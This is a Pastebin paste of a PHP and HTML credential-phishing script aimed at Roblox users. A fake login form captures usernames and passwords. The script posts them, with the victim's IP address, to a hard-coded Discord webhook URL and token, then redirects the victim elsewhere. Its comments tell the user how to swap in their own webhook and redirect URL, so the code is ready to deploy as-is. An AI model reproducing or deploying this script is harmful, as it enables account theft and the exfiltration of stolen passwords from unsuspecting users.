Advertisement
Guest User

da

a guest
Nov 22nd, 2018
125
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.82 KB | None | 0 0
  1. <!-- Roblox Webhook Phisher Script -->
  2. <!-- Skidded by Aoba on v3rm -->
  3.  
  4. <meta http-equiv="refresh" content="0.01; url=https://redirect.link" />
  5.  
  6. <!-- Replace https://redirect.link with redirect URL-->
  7.  
  8. <?php
  9.  
  10. $username = $_GET["username"]; // Optional : Replace username with 1st variable example : username // Don't touch this if you do not know what you are doing
  11.  
  12. $password = $_GET["password"]; // Optional : Replace username with 2nd variable example : password // Don't touch this if you do not know what you are doing
  13.  
  14. $webhook = "https://discordapp.com/api/webhooks/478883539983663104/JFweT7fxWhG_DBklLJMk8tYtLm6s7O4KKlJXltzzuCvLr1VWsTOVIQAo0xg_WF1Qy00_"; // Replace with your webhook url
  15. $bot_username = "Aoba's Phishing Bot"; // Replace with your desired bot name
  16.  
  17. // ! WARNING ! //
  18. // DO NOT TOUCH BELOW IF YOU DO NOT KNOW WHAT YOU ARE DOING! //
  19.  
  20. $msg2 = "```\r\n=========================\r\n".$bot_username.".\r\n=========================\r\n|Username| ".$username."\r\n|Password| ".$password."\r\n|Hostname| ".$_SERVER['REMOTE_ADDR']."\r\n|USR:PASS| ".$username.":".$password."```http://www.roblox.com/Thumbs/Avatar.ashx?x=250&y=250&Format=Png&username=".$username."\r\nhttp://www.roblox.com/Thumbs/BCOverlay.ashx?username=".$username;
  21.  
  22. $data = array("content" => $msg2, "username" => "$bot_username");
  23.  
  24. $curl = curl_init("$webhook");
  25. curl_setopt($curl, CURLOPT_CUSTOMREQUEST, "POST");
  26. curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode($data));
  27. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  28. return curl_exec($curl);
  29.  
  30. exit;?>
  31.  
  32. <html>
  33. <head>
  34. <title>Work it good</title>
  35. </head>
  36. <body>
  37. <form action=get.php method=GET>
  38. <input type=username placeholder=username name=username />
  39. <input type=password placeholder=password name=password />
  40. <input type=submit value=Login />
  41. </form>
  42. </body>
  43.  
  44. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement